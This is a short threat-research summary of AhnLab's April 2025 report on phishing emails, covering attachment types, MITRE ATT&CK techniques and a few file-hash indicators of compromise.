Threat Research

April 2025 Trends Report on Phishing Emails

Ahnlab
April 2025 Trends Report on Phishing Emails

Phishing emails in April 2025 predominantly used HTML scripts and document attachments to impersonate legitimate login pages and lure users into submitting credentials or visiting malicious websites. The report highlights trends in the distribution methods, attachment types, and case analyses related to these phishing campaigns targeting email users globally. #PhishingEmails #EmailSecurity

Keypoints

  • In March 2025, phishing attacks accounted for 79% of malware threats found in email attachments, mostly using HTML scripts to mimic legitimate pages.
  • Threat actors embed hyperlinks in documents such as PDFs to redirect victims to phishing websites.
  • The report includes classification and examples of phishing emails distributed in Korean, highlighting common subject lines and attachment names.
  • Case studies show phishing attachments primarily in script (.vbs), document, and compressed (7z) formats used to distribute fake login pages or malware.
  • Scripts and documents contain hidden hyperlinks that direct users to command and control (C2) servers or phishing websites.
  • There has been an observed increase in phishing emails distributing script files compressed in 7z archives.
  • The full ATIP report offers detailed statistics on attachment extensions, phishing trends, and malware distribution specifics.

MITRE Techniques

  • [T1566] Phishing – Threat actors use phishing emails with HTML and document attachments to trick users into entering credentials. (“…users are then prompted to enter their account credentials…”)
  • [T1204] User Execution – The phishing emails rely on users opening attachments or clicking embedded hyperlinks within documents to trigger malicious activity. (“…inserting hyperlinks into documents such as PDF files to direct users to phishing websites.”)
  • [T1071] Application Layer Protocol – Credentials and data are sent to threat actor’s C2 server through phishing websites. (“…credentials… are then sent to the threat actor’s C2 server…”)
  • [T1027] Obfuscated Files or Information – Use of compressed 7z files to distribute obfuscated script files (.vbs). (“…script files (.vbs) were compressed in 7z files and distributed via phishing emails.”)

Indicators of Compromise

  • [MD5 Hashes] Malware attachments identified – 07645fdf1ccb6ca4326369296ebd0c33, 0ef8c8c1eee5fe77118d59cd697d7bf8, and 3 more hashes.
  • [File Types] Phishing attachments – Script files (.vbs), Document files (PDF), and Compressed archives (7z) used to deliver phishing content or malware.
  • [C2 Servers] Mentioned as destinations for credential data exfiltration, though specific IPs/domains not listed in the summary.

Read more: https://asec.ahnlab.com/en/87895/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint